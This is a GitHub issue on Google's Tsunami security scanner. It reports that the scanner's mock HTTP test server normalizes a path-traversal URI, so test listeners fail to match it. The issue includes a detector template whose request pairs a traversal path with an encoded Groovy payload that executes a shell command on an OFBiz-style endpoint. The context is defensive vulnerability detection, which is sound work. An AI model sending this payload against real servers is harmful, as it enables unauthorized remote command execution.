google / google/tsunami-security-scanner

Tests Path Normalization Inconsistency

Open
#165 0 comments 0 reactions 0 assignees View on GitHub
Dominant language
Java
Stars
8.6k
Forks
925
PR merge metrics
No merged PRs in 30d

Description

When writing a templated detector for a vulnerability that exploits a path traversal in the request, it looks like the test cases normalize the request before sending it to the Mock HTTP Server (or maybe somewhere in the HTTP server).

Request:
```
actions: {
name: "execute_payload_reflective"
http_request: {
method: POST
uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
headers: [
{ name: "Content-Type" value: "application/x-www-form-urlencoded" }
]
data:
'groovyProgram=throw%20new%20Exception%28%27printf%20%25x%20133713371337%27.execute%28%29.text%29%3b'
response: {
http_status: 200
expect_all: {
conditions: [
{ body: {} contains: "1f21f020c9" }
]
}
}
}
}
```

Listener that fails a test case:
```
{
uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
status: 200
body_content:
'... 1f21f020c9 ...'
}
```

Listener that passes a test case:
```
{
uri: "/webtools/control/forgotPassword/ProgramExport"
status: 200
body_content:
'... 1f21f020c9 ...'
}
```

Meanwhile the non-mock web service being tested by the scanner receives a request to `/webtools/control/forgotPassword/foo/../ProgramExport` as expected.

Contributor guide

Open the contributing guide

Assessment

This issue has not been assessed yet.

Get new issues in your inbox

A short digest of beginner-friendly GitHub issues.